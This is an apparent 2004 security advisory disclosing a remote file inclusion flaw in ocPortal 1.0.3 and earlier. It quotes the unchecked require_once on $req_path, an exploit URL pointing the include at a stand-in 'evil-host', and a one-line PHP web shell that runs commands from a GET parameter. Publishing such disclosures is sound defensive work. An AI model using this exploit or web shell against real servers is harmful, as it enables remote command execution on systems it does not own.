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[UNIX] ocPortal File Inclusion Vulnerability

Subject: [UNIX] ocPortal File Inclusion Vulnerability
Date: 13 Oct 2004 16:34:02 +0200
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  ocPortal File Inclusion Vulnerability
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SUMMARY

 <http://ocportal.com> ocPortal is "the leader in community CMS and portal 
software for the web". A file inclusion vulnerability exists in the 
product allowing a remote attacker to insert PHP commands to the page 
being displayed by ocPortal and in addition cause them to execute.

DETAILS

Vulnerable Systems:
 * ocPortal version 1.0.3 and prior

Immune Systems:
 * ocPortal version 2.x.x

The vulnerability exists in the index.php file because there isn't any 
proper checking of the value provided by the $req_path variable.

Vulnerable code:
  if (!isset($req_path)) $req_path="";
  require_once($req_path."funcs.php");

Exploit:
By accessing the following URL: 
http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls and 
placing on the evil-host computer a file named funcs.php containing:

   <?php
     $com = $_GET["com"];
     system ("$com");
   ?>

Will cause the command 'ls' to execute, and its results to return to the 
user requesting the URL.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:exoduks@gmail.com> Exoduks.



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